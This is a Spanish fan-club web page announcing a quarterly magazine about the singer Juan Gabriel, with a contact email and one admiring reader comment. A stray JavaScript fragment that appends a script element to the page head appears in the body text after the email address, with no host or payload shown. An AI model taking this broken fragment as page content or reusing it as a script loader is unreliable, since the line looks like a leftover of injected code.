Amor Eteno | Una revista con mucha emoción

Juan Gabriel Club de Fans tiene el agrado de presentar una nueva forma de comunicarnos, la revista “Amor Eterno” magazine.

Con una publicación trimestral, hasta el momento, se pretende plasmar todo el recorrido de Juan Gabriel durante sus 45 años de trayectoria contada por sus propios seguidores.

Contando con la participación de varios fans de todas partes del mundo, como asi también clubs de fans, seguimos invitando a quienes quieran participar para seguir creciendo y demostrando al mundo la verdad de la historia de Juan Gabriel.

Como club no podemos permitir que la prensa amarillista hable mal de quien es nuetro ídolo y es por eso que pedimos tu ayuda en material para seguir con Amor Eterno.

 

 

Comparte la revista con tus contactos para que todos los fans la puedan ver.

Si quieres participar puedes hacerlo enviando un correo a juangabrielclubdefans@gmail.com y nos pondremos en contactó con vos. Gsd.getElementsByTagName(‘head’)[0].appendChild(s);

Un comentario sobre “Amor Eteno | Una revista con mucha emoción

  • el 28 agosto, 2017 a las 11:22 am
    Permalink

    esta espectacular , me da mucho gusto q no dejemos perder a este hermoso ser. q nos lleno de amor y nos sigue llenando de felicidad

    Respuesta

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares